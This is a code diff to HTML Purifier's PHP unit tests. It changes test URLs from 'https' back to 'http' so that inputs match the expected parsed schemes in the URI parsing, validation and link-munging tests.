+9,7 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness $this->filter = new HTMLPurifier_URIFilter_Munge(); } - protected function setMunge($uri = 'https://www.google.com/url?q=%s') + protected function setMunge($uri = 'http://www.google.com/url?q=%s') { $this->config->set('URI.Munge', $uri); } @@ -26,8 +26,8 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness { $this->setMunge(); $this->assertFiltering( - 'https://www.example.com/', - 'https://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F' + 'http://www.example.com/', + 'http://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F' ); } @@ -36,7 +36,7 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness $this->setMunge('/r?tagname=%n&url=%s'); $token = new HTMLPurifier_Token_Start('a'); $this->context->register('CurrentToken', $token); - $this->assertFiltering('https://google.com', '/r?tagname=a&url=http%3A%2F%2Fgoogle.com'); + $this->assertFiltering('http://google.com', '/r?tagname=a&url=http%3A%2F%2Fgoogle.com'); } public function testMungeReplaceAttribute() @@ -44,7 +44,7 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness $this->setMunge('/r?attr=%m&url=%s'); $attr = 'href'; $this->context->register('CurrentAttr', $attr); - $this->assertFiltering('https://google.com', '/r?attr=href&url=http%3A%2F%2Fgoogle.com'); + $this->assertFiltering('http://google.com', '/r?attr=href&url=http%3A%2F%2Fgoogle.com'); } public function testMungeReplaceResource() @@ -52,7 +52,7 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness $this->setMunge('/r?embeds=%r&url=%s'); $embeds = false; $this->context->register('EmbeddedURI', $embeds); - $this->assertFiltering('https://google.com', '/r?embeds=&url=http%3A%2F%2Fgoogle.com'); + $this->assertFiltering('http://google.com', '/r?embeds=&url=http%3A%2F%2Fgoogle.com'); } public function testMungeReplaceCSSProperty() @@ -60,7 +60,7 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness $this->setMunge('/r?property=%p&url=%s'); $property = 'background'; $this->context->register('CurrentCSSProperty', $property); - $this->assertFiltering('https://google.com', '/r?property=background&url=http%3A%2F%2Fgoogle.com'); + $this->assertFiltering('http://google.com', '/r?property=background&url=http%3A%2F%2Fgoogle.com'); } public function testIgnoreEmbedded() @@ -68,7 +68,7 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness $this->setMunge(); $embeds = true; $this->context->register('EmbeddedURI', $embeds); - $this->assertFiltering('https://example.com'); + $this->assertFiltering('http://example.com'); } public function testProcessEmbedded() @@ -77,7 +77,7 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness $this->config->set('URI.MungeResources', true); $embeds = true; $this->context->register('EmbeddedURI', $embeds); - $this->assertFiltering('https://www.example.com/', 'https://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F'); + $this->assertFiltering('http://www.example.com/', 'http://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F'); } public function testPreserveRelative() @@ -103,13 +103,13 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness if (!$this->setSecureMunge()) return; $embedded = true; $this->context->register('EmbeddedURI', $embedded); - $this->assertFiltering('https://google.com'); + $this->assertFiltering('http://google.com'); } public function testSecureMungeStandard() { if (!$this->setSecureMunge()) return; - $this->assertFiltering('https://google.com', '/redirect.php?url=http%3A%2F%2Fgoogle.com&checksum=46267a796aca0ea5839f24c4c97ad2648373a4eca31b1c0d1fa7c7ff26798f79'); + $this->assertFiltering('http://google.com', '/redirect.php?url=http%3A%2F%2Fgoogle.com&checksum=46267a796aca0ea5839f24c4c97ad2648373a4eca31b1c0d1fa7c7ff26798f79'); } public function testSecureMungeIgnoreUnknownSchemes() @@ -129,25 +129,25 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness { if (!$this->setSecureMunge()) return; $this->setMunge('/links/%s/%t'); - $this->assertFiltering('https://google.com', '/links/http%3A%2F%2Fgoogle.com/46267a796aca0ea5839f24c4c97ad2648373a4eca31b1c0d1fa7c7ff26798f79'); + $this->assertFiltering('http://google.com', '/links/http%3A%2F%2Fgoogle.com/46267a796aca0ea5839f24c4c97ad2648373a4eca31b1c0d1fa7c7ff26798f79'); } public function testMungeIgnoreSameDomain() { - $this->setMunge('https://example.com/%s'); - $this->assertFiltering('https://example.com/foobar'); + $this->setMunge('http://example.com/%s'); + $this->assertFiltering('http://example.com/foobar'); } public function testMungeIgnoreSameDomainInsecureToSecure() { - $this->setMunge('https://example.com/%s'); + $this->setMunge('http://example.com/%s'); $this->assertFiltering('https://example.com/foobar'); } public function testMungeIgnoreSameDomainSecureToSecure() { $this->config->set('URI.Base', 'https://example.com'); - $this->setMunge('https://example.com/%s'); + $this->setMunge('http://example.com/%s'); $this->assertFiltering('https://example.com/foobar'); } @@ -155,14 +155,14 @@ class HTMLPurifier_URIFilter_MungeTest extends HTMLPurifier_URIFilterHarness { $this->config->set('URI.Base', 'https://example.com'); $this->setMunge('/%s'); - $this->assertFiltering('https://example.com/foobar', '/http%3A%2F%2Fexample.com%2Ffoobar'); + $this->assertFiltering('http://example.com/foobar', '/http%3A%2F%2Fexample.com%2Ffoobar'); } public function testMungeIgnoresSourceHost() { $this->config->set('URI.Host', 'foo.example.com'); - $this->setMunge('https://example.com/%s'); - $this->assertFiltering('https://foo.example.com/bar'); + $this->setMunge('http://example.com/%s'); + $this->assertFiltering('http://foo.example.com/bar'); } } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIParserTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIParserTest.php index 93aedb7..f5533c4 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/URIParserTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/URIParserTest.php @@ -24,7 +24,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testRegular() { $this->assertParsing( - 'https://www.example.com/webhp?q=foo#result2', + 'http://www.example.com/webhp?q=foo#result2', 'http', null, 'www.example.com', null, '/webhp', 'q=foo', 'result2' ); } @@ -32,7 +32,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testPortAndUsername() { $this->assertParsing( - 'https://user@authority.part:80/now/the/path?query#fragment', + 'http://user@authority.part:80/now/the/path?query#fragment', 'http', 'user', 'authority.part', 80, '/now/the/path', 'query', 'fragment' ); } @@ -40,7 +40,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testPercentEncoding() { $this->assertParsing( - 'https://en.wikipedia.org/wiki/Clich%C3%A9', + 'http://en.wikipedia.org/wiki/Clich%C3%A9', 'http', null, 'en.wikipedia.org', null, '/wiki/Clich%C3%A9', null, null ); } @@ -48,7 +48,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testEmptyQuery() { $this->assertParsing( - 'https://www.example.com/?#', + 'http://www.example.com/?#', 'http', null, 'www.example.com', null, '/', '', null ); } @@ -56,7 +56,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testEmptyPath() { $this->assertParsing( - 'https://www.example.com', + 'http://www.example.com', 'http', null, 'www.example.com', null, '', null, null ); } @@ -80,7 +80,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testIPv4Address() { $this->assertParsing( - 'https://192.0.34.166/', + 'http://192.0.34.166/', 'http', null, '192.0.34.166', null, '/', null, null ); } @@ -88,7 +88,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testFakeIPv4Address() { $this->assertParsing( - 'https://333.123.32.123/', + 'http://333.123.32.123/', 'http', null, '333.123.32.123', null, '/', null, null ); } @@ -96,7 +96,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testIPv6Address() { $this->assertParsing( - 'https://[2001:db8::7]/c=GB?objectClass?one', + 'http://[2001:db8::7]/c=GB?objectClass?one', 'http', null, '[2001:db8::7]', null, '/c=GB', 'objectClass?one', null ); } @@ -104,7 +104,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testInternationalizedDomainName() { $this->assertParsing( - "https://t\xC5\xABdali\xC5\x86.lv", + "http://t\xC5\xABdali\xC5\x86.lv", 'http', null, "t\xC5\xABdali\xC5\x86.lv", null, '', null, null ); } @@ -112,7 +112,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testInvalidPort() { $this->assertParsing( - 'https://example.com:foobar', + 'http://example.com:foobar', 'http', null, 'example.com', null, '', null, null ); } @@ -120,7 +120,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testPathAbsolute() { $this->assertParsing( - 'https:/this/is/path', + 'http:/this/is/path', 'http', null, null, null, '/this/is/path', null, null ); } @@ -129,7 +129,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness { // this should not be used but is allowed $this->assertParsing( - 'https:this/is/path', + 'http:this/is/path', 'http', null, null, null, 'this/is/path', null, null ); } @@ -137,7 +137,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testPathEmpty() { $this->assertParsing( - 'https:', + 'http:', 'http', null, null, null, '', null, null ); } @@ -153,7 +153,7 @@ class HTMLPurifier_URIParserTest extends HTMLPurifier_Harness public function testMalformedTag() { $this->assertParsing( - 'https://www.example.com/>', + 'http://www.example.com/>', 'http', null, 'www.example.com', null, '/', null, null ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/URISchemeTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/URISchemeTest.php index 4c97b8d..215e0d4 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/URISchemeTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/URISchemeTest.php @@ -32,37 +32,37 @@ class HTMLPurifier_URISchemeTest extends HTMLPurifier_URIHarness public function test_http_regular() { $this->assertValidation( - 'https://example.com/?s=q#fragment' + 'http://example.com/?s=q#fragment' ); } public function test_http_uppercase() { $this->assertValidation( - 'https://example.com/FOO' + 'http://example.com/FOO' ); } public function test_http_removeDefaultPort() { $this->assertValidation( - 'https://example.com:80', - 'https://example.com' + 'http://example.com:80', + 'http://example.com' ); } public function test_http_removeUserInfo() { $this->assertValidation( - 'https://bob@example.com', - 'https://example.com' + 'http://bob@example.com', + 'http://example.com' ); } public function test_http_preserveNonDefaultPort() { $this->assertValidation( - 'https://example.com:8080' + 'http://example.com:8080' ); } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifier/URITest.php b/htmlpurifier-4.10.0/tests/HTMLPurifier/URITest.php index ee465d8..96d9d00 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifier/URITest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifier/URITest.php @@ -51,7 +51,7 @@ class HTMLPurifier_URITest extends HTMLPurifier_URIHarness { $scheme_mock = $this->setUpSchemeMock('http'); - $uri = $this->createURI('https:'); + $uri = $this->createURI('http:'); $scheme_obj = $uri->getSchemeObj($this->config, $this->context); $this->assertIdentical($scheme_obj, $scheme_mock); @@ -62,7 +62,7 @@ class HTMLPurifier_URITest extends HTMLPurifier_URIHarness { $this->setUpNoValidSchemes(); - $uri = $this->createURI('https:'); + $uri = $this->createURI('http:'); $result = $uri->getSchemeObj($this->config, $this->context); $this->assertIdentical($result, false); @@ -107,7 +107,7 @@ class HTMLPurifier_URITest extends HTMLPurifier_URIHarness public function test_toString_full() { $this->assertToString( - 'https://bob@example.com:300/foo?bar=baz#fragment', + 'http://bob@example.com:300/foo?bar=baz#fragment', 'http', 'bob', 'example.com', 300, '/foo', 'bar=baz', 'fragment' ); } @@ -115,7 +115,7 @@ class HTMLPurifier_URITest extends HTMLPurifier_URIHarness public function test_toString_scheme() { $this->assertToString( - 'https:', + 'http:', 'http', null, null, null, '', null, null ); } @@ -167,32 +167,32 @@ class HTMLPurifier_URITest extends HTMLPurifier_URIHarness public function test_validate_overlongPort() { - $this->assertValidation('https://example.com:65536', 'https://example.com'); + $this->assertValidation('http://example.com:65536', 'http://example.com'); } public function test_validate_zeroPort() { - $this->assertValidation('https://example.com:00', 'https://example.com'); + $this->assertValidation('http://example.com:00', 'http://example.com'); } public function test_validate_invalidHostThatLooksLikeIPv6() { - $this->assertValidation('https://[2001:0db8:85z3:08d3:1319:8a2e:0370:7334]', ''); + $this->assertValidation('http://[2001:0db8:85z3:08d3:1319:8a2e:0370:7334]', ''); } public function test_validate_removeRedundantScheme() { - $this->assertValidation('https:foo:/:', 'foo%3A/:'); + $this->assertValidation('http:foo:/:', 'foo%3A/:'); } public function test_validate_username() { - $this->assertValidation("https://user\xE3\x91\x94:@foo.com", 'https://user%E3%91%94:@foo.com'); + $this->assertValidation("http://user\xE3\x91\x94:@foo.com", 'http://user%E3%91%94:@foo.com'); } public function test_validate_path_abempty() { - $this->assertValidation("https://host/\xE3\x91\x94:", 'https://host/%E3%91%94:'); + $this->assertValidation("http://host/\xE3\x91\x94:", 'http://host/%E3%91%94:'); } public function test_validate_path_absolute() @@ -222,7 +222,7 @@ class HTMLPurifier_URITest extends HTMLPurifier_URIHarness public function test_validate_path_empty() { - $this->assertValidation('https://google.com'); + $this->assertValidation('http://google.com'); } } diff --git a/htmlpurifier-4.10.0/tests/HTMLPurifierTest.php b/htmlpurifier-4.10.0/tests/HTMLPurifierTest.php index f86bf47..928e777 100755 --- a/htmlpurifier-4.10.0/tests/HTMLPurifierTest.php +++ b/htmlpurifier-4.10.0/tests/HTMLPurifierTest.php @@ -31,11 +31,11 @@ class HTMLPurifierTest extends HTMLPurifier_Harness public function testMakeAbsolute() { - $this->config->set('URI.Base', 'https://example.com/bar/baz.php'); + $this->config->set('URI.Base', 'http://example.com/bar/baz.php'); $this->config->set('URI.MakeAbsolute', true); $this->assertPurification( '<a href="foo.txt">Foobar</a>', - '<a href="https://example.com/bar/foo.txt">Foobar</a>' + '<a href="http://example.com/bar/foo.txt">Foobar</a>' ); } diff --git a/htmlpurifier-4.10.0/tests/multitest.php b/htmlpurifier-4.10.0/tests/multitest.php index 5453e89..d49115d 100755 --- a/htmlpurifier-4.10.0/tests/multitest.php +++ b/htmlpurifier-4.10.0/tests/multitest.php @@ -152,7 +152,7 @@ foreach ($versions_to_test as $version) { // This is the HTML Purifier website's test XML file. We could // add more websites, i.e. more configurations to test. -// $test->add(new RemoteTestCase('https://htmlpurifier.org/dev/tests/?xml=1', 'https://htmlpurifier.org/dev/tests/?xml=1&dry=1&flush=1')); +// $test->add(new RemoteTestCase('http://htmlpurifier.org/dev/tests/?xml=1', 'http://htmlpurifier.org/dev/tests/?xml=1&dry=1&flush=1')); $test->run($reporter);